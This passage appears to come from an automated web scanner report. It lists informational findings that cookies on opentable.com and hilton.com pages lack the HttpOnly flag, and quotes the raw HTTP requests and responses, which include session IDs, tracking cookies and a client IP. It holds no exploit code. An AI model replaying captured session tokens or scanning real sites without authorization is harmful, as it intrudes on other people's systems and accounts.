Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...
12.73. http://www.opentable.com/restaurant-search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 12:54:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Location: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0; domain=.opentable.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.opentable.com/interim.aspx?rid=90&amp;restref=90&amp;m=4&amp;t=single&amp;p=2&amp;d=10/3/2011 7:00 PM&amp;
...[SNIP]...
12.74. http://www1.hilton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www1.hilton.com/en_US/hi/index.do
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Mon, 03 Oct 2011 13:05:32 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:32 GMT;path=/

12.75. http://www1.hilton.com/doxch.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /doxch.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /doxch.do?dst=http://GW-HI/en_US/hi/search/findhotels/passiveSearch.htm?it=Find,city HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
Content-Length: 704
Cache-Control: max-age=0
Origin: http://www1.hilton.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; mmcore.tst=0.544; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777; K3R7=0; NSC_qse-qgt=44153d5f3660

location=0&hotelSearchOneBox=bos&checkin=03+Oct+2011&checkout=04+Oct+2011&numberOfRooms=1&room1Adults=1&room1Children=0&room2Adults=1&room2Children=0&room3Adults=1&room3Children=0&room4Adults=1&room4C
...[SNIP]...

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www3.hilton.com/en_US/hi/search/findhotels/passiveSearch.htm?xch=1041788384,4E9B21AE664381D1B53DE8378483FB39.etc13&it=Find,city&minLengthOfStay=0&hdnNumRoomsInAdv=N&checkin=03+Oct+2011&specialCodeCorporate=&hdnMainAction=/search/findhotels/passiveSearch.htm&specialCodeGroup=&brandIdLowerCase=hi&brandId=HI&isHomePage=true&searchType=all&location=0&ctyhocn=&numberOfRooms=1&room4Adults=1&room1Adults=1&room3Adults=1&source=PFSBrandHomeSearch&room2Adults=1&room3Children=0&locale=en_US&hdnPFSIsResPage=Y&hotelSearchOneBox=bos&isReward=false&hdnGuestSuits=1&room1Children=0&hdnGuestSuitsIndex=0&hdnSerchType=N&flexibleSearch=false&globalWebLite=&brands=HI&dynamoLocale=en&hdnPage=Y&checkout=04+Oct+2011&specialCodePromotion=&room4Children=0&roomsRequested=1&queryOneBox=bos&units=MI&room2Children=0&pageBrandId=HI
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Mon, 03 Oct 2011 12:52:54 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:54 GMT;path=/

12.76. http://www1.hilton.com/en_US/common/img/ui-bg_highlight-hard_100_f9f9f9_1x100.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/common/img/ui-bg_highlight-hard_100_f9f9f9_1x100.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/common/img/ui-bg_highlight-hard_100_f9f9f9_1x100.png HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; mmcore.tst=0.544; K3R7=CT-1; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; NSC_qse-qgt=44153d5f3660; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635584777:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 09 Sep 2011 19:01:54 GMT
ETag: "56-cf846c80"
Accept-Ranges: bytes
Content-Length: 86
Content-Type: image/png
Date: Mon, 03 Oct 2011 12:52:44 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:44 GMT;path=/

.PNG
.
...IHDR.......d.....G,Z`....IDAT..c....&.....J....l..I..M"..tg.....IEND.B`.
12.77. http://www1.hilton.com/en_US/hh/home_index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hh/home_index.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hh/home_index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?it=Tnav,HHonors HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://hhonors1.hilton.com/en_US/hh/home_index.do?it=Tnav,HHonors
Content-Length: 0
Content-Type: text/plain; charset=UTF-8
Date: Mon, 03 Oct 2011 13:05:31 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:31 GMT;path=/

12.78. http://www1.hilton.com/en_US/hi/customersupport/feedback.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/feedback.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/customersupport/feedback.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do;jsessionid=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; NSC_qse-qgt=44153d5f3660; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637043717:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:17:04 GMT
Content-Length: 36138
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:28:04 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
12.79. http://www1.hilton.com/en_US/hi/customersupport/index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/index.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/customersupport/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:00 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:00 GMT;path=/
Content-Length: 35005


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
12.80. http://www1.hilton.com/en_US/hi/customersupport/local-reservations.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/local-reservations.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/customersupport/local-reservations.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/customersupport/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; JSESSIONID=C16BADB2FE2A22CE7D8F31B09490D8B4.etc64; cross-sell=hi; mmcore.tst=0.482; mmid=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.pd=510181832%7CCwAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317637060085:ss=1317635584777; NSC_qse-qgt=44153d5f3660

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:17:38 GMT
Content-Length: 76665
Connection: close
Vary: Accept-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:28:38 GMT;path=/


                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name
...[SNIP]...
12.81. http://www1.hilton.com/en_US/hi/customersupport/site-usage.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/customersupport/site-usage.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/customersupport/site-usage.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790; K3R7=0; GWSESSIONID=QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623; cross-sell=hi; ClrCSTO=T; mmcore.tst=0.798; mmid=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=688320496%7CCQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrSSID=1317646383790-9086; NSC_qse-qgt=44153d5f3660; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317635903346:ss=1317635584777

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 69511
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:58:07 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:09:07 GMT;path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta name=
...[SNIP]...
12.82. http://www1.hilton.com/en_US/hi/homeNew.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/homeNew.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/homeNew.do HTTP/1.1
Host: www1.hilton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www1.hilton.com/en_US/hi/index.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BetaCookie=Y; JSESSIONID=4E9B21AE664381D1B53DE8378483FB39.etc13; cross-sell=hi; NSC_qse-qgt=44153d5f3660; mmcore.tst=0.544; K3R7=CT-1; mmid=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.pd=-839280809%7CAQAAAAodekFwyAYAAA%3D%3D; mmcore.srv=cg1.usw; ClrCSTO=T; ClrSSID=1317646383790-9086; ClrOSSID=1317646383790-9086; ClrSCD=1317646383790

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Content-Length: 5573
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 12:52:42 GMT
Connection: close
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:03:42 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
   <title></title>
   <script language="javascript" type="text/javascript">
       function gotopage(destUrl) {
           parent.l
...[SNIP]...
12.83. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/accommodations.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:07 GMT;path=/
Content-Length: 55346


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
12.84. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/directions.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:24 GMT;path=/
Content-Length: 65409


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
12.85. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/index.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 84893


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta
...[SNIP]...
12.86. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/localguide.do HTTP/1.1
Host: www1.hilton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Mon, 03 Oct 2011 13:05:05 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_qse-qgt=44153d5f3660;expires=Mon, 03-Oct-11 13:16:05 GMT;path=/
Content-Length: 47470


                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
   <head>
       

<meta na
...[SNIP]...
12.87. http://www1.hilton.com/en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.hilton.com
Path:   /en_US/hi/hotel/BOSLHHH-Hilton-Boston-Logan-Airport-Massachusetts/services.do

Issue detail

